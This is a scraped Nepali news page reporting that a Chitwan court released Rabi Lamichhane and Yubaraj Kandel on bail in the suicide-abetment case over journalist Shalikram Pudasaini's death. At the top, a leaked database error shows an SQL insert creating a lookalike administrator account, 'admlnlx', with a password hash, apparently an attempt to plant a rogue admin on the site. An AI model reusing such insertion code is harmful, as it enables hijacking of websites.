WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFk0nzbzVOYaReDRxgPz5P7Vf1Lz9f.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 16:20:23', '', 'admlnlx', 'admlnlx')

रवि लामिछाने र युराज कँडेललाई धरौटीमा छोड्न जिल्ला अदालत चितवनको आदेश – Gaule Khabar

रवि लामिछाने र युराज कँडेललाई धरौटीमा छोड्न जिल्ला अदालत चितवनको आदेश

रवि लामिछाने र युराज कँडेललाई धरौटीमा छोड्न जिल्ला अदालत चितवनको आदेश

भदौ ९, काठमाडौं । पत्रकार शालिकराम पुडासैनी आत्महत्या प्रकरणमा पक्राउ परेका टेलिभिजन कार्यक्रम प्रस्तोता रवि लामिछानेसहित ३ जना धरौटीमा छाड्न जिल्ला अदालत चितवनले आदेश दिएको छ । जिल्ला अदालत, चितवनले लामिछानेलाई ५ लाख, सञ्चारकर्मी युवराज कँडेललाई ३ लाख र नर्स अस्मिता भनिने रुकु कार्कीलाई साधारण तारेखमा छाड्न आदेश दिएको थियो ।

सोमबार जिल्ला अदालत, चितवनका न्यायधीश हेमन्तप्रकाश रावलको इजलासले आत्महत्या दुरूत्साहन गरेको कसूरमा धरौटी लिएर तीनै जनालाई छाड्न आदेश दिएको हो । यसअघि जिल्ला प्रहरी कार्यालय, चितवनले १० दिनसम्म अनुसन्धान गरेर आइतबार रायसहितको प्रतिवेदन जिल्ला सरकारी वकिल कार्यालयमा बुझाएको थियो । कार्यालयले अनुसन्धान प्रतिवेदनको अध्ययन सोही दिन सकेर जिल्ला अदालत, चितवनमा आत्महत्या दुत्साहनको मुद्दा दर्ता गराएको थियो ।

माउन्टेन टेलिभिजका पत्रकार शालिकराम पुडासैनी साउन गते चितवनको एक होटलमा झुण्डिएको अवस्थामा भेटिएका थिए । पत्रकार पुडासैनी ‘सिधा कुरा जनतासँग’का पूर्वसंवाददाता हुन् । हालै न्यूज ट्वेन्टी फो टेलिभिजन छाडेर उनी माउन्टेन टेलिभिजनमा उनी कार्यरत थिए ।

आत्महत्या गर्नुपूर्व उनले लामिछाने, कँडेल र कार्कीका कारण आफू मर्न बाध्य भएको भन्दै आफ्नो मोबाइलमा रेकर्ड गरेको भिडियो बाहिरिएपछि प्रहरीले साउन ३० गते तीनै जनालार्इ गिरफ्तार गरेको थियो ।
-अनलाइन खबर

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका